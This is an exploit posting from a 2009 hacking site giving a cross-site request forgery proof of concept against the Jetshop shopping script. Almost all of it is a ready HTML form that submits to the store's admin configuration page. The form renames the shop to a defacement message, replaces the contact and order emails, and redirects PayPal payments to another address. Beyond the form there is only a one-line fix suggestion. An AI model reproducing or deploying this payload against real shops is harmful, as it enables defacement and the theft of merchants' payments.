Jetshop Shopping Script ~ XSRF Vuln. | Cyber-Warrior Information Technology's World

Root > Exploits / Vulnerabilities > Jetshop Shopping Script ~ XSRF Vuln.

Madde
	Author : Bug Researchers/F0RTYS3V3N
	Date : 13.09.2009 20:03:55
	# Jetshop Shopping Script ~ XSRF Vuln. [Full Screen Display]

	<------------------- header data start ------------------- > ############################################################# # author : F0RTYS3V3N # Script Name : Jetshop Alisveris Scripti # Download : http://scripti.org/script_shop-script-alisveris-scripti_196_21.html # Demo : http://scripti.org/demo.php?id=196 # Bug Type : XSRF # Infection : Header \| Payyball bilgileri \| Iletisim BIlgileri Degistirilebilir # Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmelidir. ############################################################# < ------------------- header data end of ------------------- > < -- bug code start -- > <form action=http://localhost/shop/yonetici.php?dpt=conf method=post> <input type=hidden name=dpt value=conf> <input type=hidden name=sub value=general> <input type=hidden name=save_general value=1> <input type=text name=shop_name value=H4CK3D BY F0RTYS3V3N></td> <input type=text name=shop_url value=www.F0RTYS3V3N.com></td> <input type=text name=general_email value=mailadresin@degisti.com></td> <input type=text name=orders_email value=baskamail@yok.net></td> <input type=text name=currency_id_left value=$></td> <input type=text name=currency_id_right value=></td> <input type=text name=currency_iso3 value=USD></td> <select name=paypal_enabled> <option value=0>hayir</option> <option value=1 selected>evet</option> </select> <input type=text name=paypal_email value=pay@paypal.com></td> <input type=submit value=Kaydet> </form> < -- bug code end of -- >